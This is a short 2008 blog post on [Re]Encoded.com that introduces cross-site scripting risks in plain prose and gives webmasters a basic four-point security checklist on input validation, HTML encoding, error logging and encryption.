Web Security Isn’t Scary!

August 1st, 2008 Posted in Security

Security is the lifeblood of any web application and every online business. No matter how hard you work designing a great site, creating high-end content, building a lively traffic stream, and improving every aspect of your online business, it can easily be stolen away if you aren’t protected.

Protecting your web presence seems like a daunting task, but there are simple solutions that any webmaster can do to increase security of their applications.

One of the most common and easy to exploit security braches is XSS attacks. Rather than targeting the actual server, these attacks target you website visitors. The attackers use vulnerabilities in Applications to add malicious code (usually JavaScript) to change the visitors experience on your site. Some common examples of malicious code include redirecting traffic to another site, changing browser settings and/or downloading ad/spyware, stealing cookie data, and about anything that can be accomplished with JavaScript.

Sometimes a hacker won’t even have to manipulate your code to exploit your scripts. It is vital that application developers scrub all their data and ensure that every piece of data that will be outputted is validated, checked, and sanitized. And while that might seem like a chore, again, it’s fairly simple to ensure your data is safe. Here’s a quick list of things to check in every Application.

1. Validate all input parameters: When you are asking for data on a form, you are expecting a certain type of data. If you aren’t validating your data using you are not only leaving a huge security risk, but you are getting “dirty data”. There are hundreds of tutorials on validating forms. If you don’t know how, go out and figure it out. Note: Don’t only rely on JavaScript validation, especially for applications that allow lots of interactivity. JavaScript is easily broken. Look into isValid() for an easy way to validate data.

2. Another very important element is not allowing HTML to be added in your forms. Allowing HTML to be added opens up numerous security holes. The htmlEditFormat() function should be used on all input parameters to prevent HTML attacks.

3. Be sure to use error handling. Have every error that the script produces be logged and sent to the administrator, especially for your interactive elements of the site. If someone is attempting to break your script, this will allow you to know what they are doing, when they did it, and give you insight on how to keep your site web applications secure.

4. Encrypt your data. Most platforms have built-on encryption tools. USE THEM! There’s really no reason not to, especially for sensitive data like credit cards, social security numbers, and passwords.

While this isn’t a comprehensive list, it does give you a great start and gives you a new outlook on internet security. Remember, it’s up to you to keep your applications safe. Spend the extra few minutes ensuring that your hard work isn’t wiped away.

Author -

who has written 27 posts on [Re]Encoded.com.

Contact the author

Leave a Reply